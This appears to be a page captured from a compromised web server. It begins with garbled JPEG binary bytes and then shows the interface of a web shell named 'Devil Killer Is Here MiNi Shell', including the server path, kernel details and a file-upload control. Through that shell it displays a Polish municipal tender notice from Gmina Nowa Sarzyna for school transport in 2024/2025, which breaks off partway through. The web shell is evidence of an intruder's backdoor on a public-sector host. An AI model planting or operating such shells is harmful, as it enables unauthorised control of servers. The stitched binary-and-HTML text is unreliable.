JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240626/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240626/0038467801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz dzieci i uczniów z terenu Gminy Nowa Sarzyna do przedszkoli, szkół i ośrodka edukacyjnego oraz na zajęcia sportowe w roku szkolnym 2024/2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA NOWA SARZYNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581749</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Mikołaja Kopernika 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Sarzyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-310</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@nowasarzyna.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.nowasarzyna.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz dzieci i uczniów z terenu Gminy Nowa Sarzyna do przedszkoli, szkół i ośrodka edukacyjnego oraz na zajęcia sportowe w roku szkolnym 2024/2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-290759b5-3381-11ef-acf6-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00384678</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00039836/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Zakup biletów miesięcznych dla dzieci i uczniów dojeżdżających do szkół i przedszkoli na terenie Miasta i Gminy Nowa Sarzyna w roku szkolnym 2024/2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-290759b5-3381-11ef-acf6-4e696a6d8c25 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Platforma e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/><br/>lub<br/><br/>poczta elektroniczna: zamowienia@nowasarzyna.eu (za wyjątkiem oferty oraz dokumentów składanych wraz z ofertą, które należy składać wyłącznie na platformie e-Zamówienia).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>1) Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>lub<br/>2) poczty elektronicznej: zamowienia@nowasarzyna.eu.<br/><br/>2. Wnioski, zawiadomienia oraz informacje (zwane dalej ogólnie „korespondencją”) Zamawiający i Wykonawcy przekazują, powołując się na numer ogłoszenia (BZP) lub numerem referencyjnym postępowania, drogą elektroniczną:<br/>1) za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”);<br/>lub<br/>2) za pomocą poczty elektronicznej na adres: zamowienia@nowasarzyna.eu, za wyjątkiem oferty oraz dokumentów składanych wraz z ofertą, które należy składać wyłącznie w sposób wskazany w rozdz. 18 SWZ.<br/><br/>3. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/><br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/><br/>5. Wykonawca ubiegając się o udzielenie zamówienia, w szczególności składając ofertę, akceptuje zasady korzystania z Platformy e-Zamówienia wskazane w SWZ oraz Regulaminie Platformy e-Zamówienia.<br/><br/>6. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/><br/>7. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/><br/>8. W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/><br/>9. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), zwanym w dalszej treści: „rozporządzeni Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych”.<br/><br/>10. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2017 r. poz. 2247), zwanym w dalszej treści: „rozporządzenie Rady Ministrów w sprawie Krajowych Ram Interoperacyjności”, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>UWAGA!<br/>Wśród rozszerzeń powszechnych a niewystępujących w rozporządzeniach, o których mowa w pkt. 9 oraz 10 znajdują się m.in.: .rar, .gif, .bmp. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/><br/>11. Ze względu na ograniczoną liczbę znaków, które można wprowadzić do treści ogłoszenia, pozostałe informacje zawarto w rozdz. 13 SWZ dostępnym na stronie prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia Dyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1) zawarta jest w rozdziale 28 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.2.11.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 zamówienia – Zakup biletów miesięcznych dla dzieci i uczniów oraz opiekunów dojeżdżających do Przedszkola Samorządowego „Źródełko” w Woli Zarczyckiej, Szkoły Podstawowej im. Prymasa Tysiąclecia w Woli Zarczyckiej<br/><br/>1. Przewozy dzieci i uczniów odbywać się będą zgodnie z harmonogramem przedstawionym w pkt. 4.2 ppkt. 1 SWZ. <br/>Zamawiający przekaże Wykonawcy ostateczną liczbę uczniów przed rozpoczęciem roku szkolnego 2024/2025. <br/>Zamawiający odpowiada za bezpieczeństwo przewożonych uczniów w trakcie trwania przewozu oraz zapewnia w tym czasie nad nimi opiekę.<br/>Usługa dowozu dzieci i uczniów do szkół i przedszkoli obejmuje również przewóz opiekunów na podanych trasach. Cena jednego biletu miesięcznego brutto dla dzieci i uczniów (biletu ulgowego) stanowi równowartość 51% ceny jednego biletu miesięcznego brutto dla opiekunów (pełnego biletu). <br/>Dowozu dzieci i uczniów na danej trasie nie można realizować wspólnie z dowozami pasażerów, wykonywanych na liniach regularnych.<br/><br/>2. W przypadku dowozu uczniów z orzeczeniami o potrzebie kształcenia specjalnego przewozy odbywać się będą pojazdami wyposażonymi w:<br/>1) pasy przy każdym fotelu,<br/>2) apteczkę, ze szczególnym uwzględnieniem środków ochrony osobistej,<br/>3) możliwość zasłonięcia szyb,<br/>4) oznaczenia informujące o przewozie osób z niepełnosprawnościami,<br/>5) przestrzeń bagażową, umożliwiającą przewóz plecaków, toreb, ale także kul, chodzików lub złożonego wózka inwalidzkiego.<br/><br/>3. Godziny dowozu i odwozu uczniów, trasa przejazdu oraz liczba dowożonych i odwożonych uczniów mogą ulec zmianie w trakcie realizacji zamówienia. Zamawiający o tym fakcie poinformuje Wykonawcę na piśmie z co najmniej 7 dniowym wyprzedzeniem.<br/><br/>4. Przewóz uczniów do placówek odbywać się będzie w dni nauki szkolnej, w oparciu o obowiązujące Rozporządzenie Ministra Edukacji Narodowej z 11 sierpnia 2017 r. w sprawie organizacji roku szkolnego z wyłączeniem przerw świątecznych i innych dni wolnych od zajęć wynikających z organizacji roku szkolnego.<br/><br/>5. Wykonawca na zlecenie Dyrektora placówki, zobowiązany będzie zapewnić transport również w dni, w które uczniowie będą odpracowywali inne dni zwolnione z nauki szkolnej. W przypadku odpracowania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz uczniów zgodnie z ustalonym rozkładem jazdy.<br/><br/>6. Dowóz dzieci może być organizowany w dni wolne od zajęć dydaktycznych (np. w dni egzaminów, sprawdzianów, przerw świątecznych oraz w inne dodatkowe wolne dni od zajęć szkolnych). Wykonawca zostanie poinformowany o planowanych zmianach w terminach dowozu uczniów związanych ze zmianą organizacji nauki w szkole/przedszkolu przez Dyrektora placówki z co najmniej 2-dniowym wyprzedzeniem.<br/><br/>7. Dyrektor placówki przekaże Wykonawcy imienną listę adresową uczniów i opiekunów uprawnionych do przejazdów na trasie dotyczącej przedmiotowego zadania.<br/><br/>8. Dyrektor placówki lub osoba przez niego upoważniona przygotowuje comiesięczne zestawienia ilościowe biletów, na podstawie danych przekazanych przez Wykonawcę, zatwierdza je i przekazuje do Centrum Usług Wspólnych w Nowej Sarzynie.<br/><br/>9. Dowożenie dzieci będzie się odbywać środkiem transportu w pełni sprawnym technicznie i posiadającym aktualne badania techniczne oraz wyposażonym w klimatyzację. <br/>Kierowca oraz środek transportu, którym odbywać się będzie dowożenie dzieci powinien spełniać wszelkie wymogi określone w ustawie z dnia 20 czerwca 1997 r. – Prawo o ruchu drogowym oraz przepisów wykonawczych do tej ustawy.<br/><br/>10. Kierowca pojazdu musi posiadać:<br/>a) prawo jazdy kategorii uprawniającej go do prowadzenia pojazdu,<br/>b) aktualne zaświadczenie o dopuszczeniu do wykonywania zawodu kierowcy, wydane przez uprawnionego lekarza do badania kierowców,<br/>c) przeszkolenie w zakresie przepisów BHP,<br/>d) ukończony kurs udzielania pierwszej pomocy.<br/><br/>11. Kierowca pojazdu zobowiązany jest współdziałać z opiekunem w zakresie bezpieczeństwa w czasie jazdy i postoju, biorąc pod uwagę wskazówki opiekuna.<br/><br/>12. Pojazdy, którymi Wykonawca będzie świadczył usługi muszą posiadać ubezpieczenie OC i NNW oraz muszą być utrzymywane w czystości. Wykonawca ponosi odpowiedzialność za szkody wynikające z naruszenia zasad bezpieczeństwa ruchu drogowego oraz za nie zapewnienie uczniom i opiekunom odpowiednich warunków bezpieczeństwa i higieny w czasie przejazdu.<br/><br/>13. W zimie każdy pojazd musi posiadać ogrzewanie wewnętrzne oraz ogumienie zimowe. Stopnie wejściowe powinny być oczyszczone z ewentualnego oblodzenia, tak by były bezpieczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert przyznając punkty w oparciu o następujące kryteria oceny ofert:<br/>1) Cena – (C) – waga 60%,<br/>2) Czas podstawienia autobusu zastępczego w razie awarii – (T) – waga 40%.<br/><br/>2. Sposób oceny ofert.<br/>1) Zasady oceny za kryterium „Cena”:<br/>a) Punkty za kryterium „Cena” (C) zostaną obliczone w następujący sposób:<br/><br/>C = C(of._min) / C(of._bad) × 60 pkt<br/><br/>gdzie:<br/>C – ilość punktów, jakie otrzyma badana oferta za kryterium „Cena”,<br/>C(of._min) – najniższa cena spośród ofert nie podlegających odrzuceniu,<br/>C(of._bad) – cena oferty badanej.<br/><br/>b) W kryterium „Cena” oferta z najniższą ceną otrzyma 60 pkt. natomiast pozostałe oferty po przeliczeniu zgodnie z powyższym wzorem odpowiednio mniej. <br/><br/>2) Zasady oceny za kryterium „Czas podstawienia autobusu zastępczego w razie awarii”.<br/>a) Punkty za kryterium „Czas podstawienia autobusu zastępczego w razie awarii – (T)” zostaną obliczone w następujący sposób:<br/><br/>Najkrótszy czas podstawienia autobusu zastępczego w razie awarii otrzyma 40 pkt, pozostałe proporcjonalnie mniej wg następującego przelicznika:<br/><br/>T = 40 pkt - [(Tw - 10) x 2 pkt] <br/><br/>gdzie:<br/>T – ilość punktów przyznanych Wykonawcy w kryterium czas podstawienia autobusu zastępczego w razie awarii<br/>Tw – czas podstawienia autobusu zaoferowany przez ocenianego Wykonawcę<br/><br/>b) Czas podstawienia autobusu zastępczego w razie awarii będzie liczony w pełnych minutach.<br/>c) Zamawiający określa minimalny oraz maksymalny czas podstawienia autobusu zastępczego w razie awarii w przedziale od 10 minut do 30 minut.<br/>d) Dla potrzeb oceny punktowej zaoferowany czas podstawienia pojazdu zastępczego w razie awarii krótszy niż 10 minut traktowany będzie jako czas równy 10 minut. <br/>e) Jeżeli Wykonawca zaproponuje czas podstawienia autobusu zastępczego w razie awarii dłuższy niż 30 minut Zamawiający ofertę odrzuci.<br/>f) W przypadku gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego czasu podstawienia autobusu zastępczego w razie awarii Zamawiający uzna, iż Wykonawca nie przewiduje podstawiania autobusu zastępczego w razie awarii i ofertę odrzuci.<br/><br/>3. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Px = Cx + Tx<br/><br/>gdzie:<br/>Px – ilość punktów, które otrzyma oferta „x”,<br/>Cx – ilość punktów, które otrzyma oferta „x” za kryterium „Cena”,<br/>Tx – ilość punktów, które otrzyma oferta „x” za kryterium „Czas podstawienia autobusu zastępczego w razie awarii”<br/><br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza w zakresie poszczególnych części zamówienia. Oferta może uzyskać maksymalnie 100 pkt. w każdej z części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 zamówienia – Zakup biletów miesięcznych dla dzieci i uczniów oraz opiekunów dojeżdżających do Szkoły Podstawowej w Wólce Łętowskiej, Przedszkola Samorządowego w Łętowni, Szkoły Podstawowej im. św. Jana Pawła II w Łętowni 286, Szkoły Podstawowej im. św. Jana Pawła II w Łętowni 118 (Sołectwo Majdan Łętowski)<br/><br/>1. Przewozy dzieci i uczniów odbywać się będą zgodnie z harmonogramem przedstawionym w pkt. 4.2 ppkt. 2 SWZ. <br/>Zamawiający przekaże Wykonawcy ostateczną liczbę uczniów przed rozpoczęciem roku szkolnego 2024/2025. <br/>Zamawiający odpowiada za bezpieczeństwo przewożonych uczniów w trakcie trwania przewozu oraz zapewnia w tym czasie nad nimi opiekę.<br/>Usługa dowozu dzieci i uczniów do szkół i przedszkoli obejmuje również przewóz opiekunów na podanych trasach. Cena jednego biletu miesięcznego brutto dla dzieci i uczniów (biletu ulgowego) stanowi równowartość 51% ceny jednego biletu miesięcznego brutto dla opiekunów (pełnego biletu). <br/>Dowozu dzieci i uczniów na danej trasie nie można realizować wspólnie z dowozami pasażerów, wykonywanych na liniach regularnych.<br/><br/>2. W przypadku dowozu uczniów z orzeczeniami o potrzebie kształcenia specjalnego przewozy odbywać się będą pojazdami wyposażonymi w:<br/>1) pasy przy każdym fotelu,<br/>2) apteczkę, ze szczególnym uwzględnieniem środków ochrony osobistej,<br/>3) możliwość zasłonięcia szyb,<br/>4) oznaczenia informujące o przewozie osób z niepełnosprawnościami,<br/>5) przestrzeń bagażową, umożliwiającą przewóz plecaków, toreb, ale także kul, chodzików lub złożonego wózka inwalidzkiego.<br/><br/>3. Godziny dowozu i odwozu uczniów, trasa przejazdu oraz liczba dowożonych i odwożonych uczniów mogą ulec zmianie w trakcie realizacji zamówienia. Zamawiający o tym fakcie poinformuje Wykonawcę na piśmie z co najmniej 7 dniowym wyprzedzeniem.<br/><br/>4. Przewóz uczniów do placówek odbywać się będzie w dni nauki szkolnej, w oparciu o obowiązujące Rozporządzenie Ministra Edukacji Narodowej z 11 sierpnia 2017 r. w sprawie organizacji roku szkolnego z wyłączeniem przerw świątecznych i innych dni wolnych od zajęć wynikających z organizacji roku szkolnego.<br/><br/>5. Wykonawca na zlecenie Dyrektora placówki, zobowiązany będzie zapewnić transport również w dni, w które uczniowie będą odpracowywali inne dni zwolnione z nauki szkolnej. W przypadku odpracowania zajęć szkolnych w innym dniu wolnym od zajęć, Wykonawca zobowiązany jest zapewnić przewóz uczniów zgodnie z ustalonym rozkładem jazdy.<br/><br/>6. Dowóz dzieci może być organizowany w dni wolne od zajęć dydaktycznych (np. w dni egzaminów, sprawdzianów, przerw świątecznych oraz w inne dodatkowe wolne dni od zajęć szkolnych). Wykonawca zostanie poinformowany o planowanych zmianach w terminach 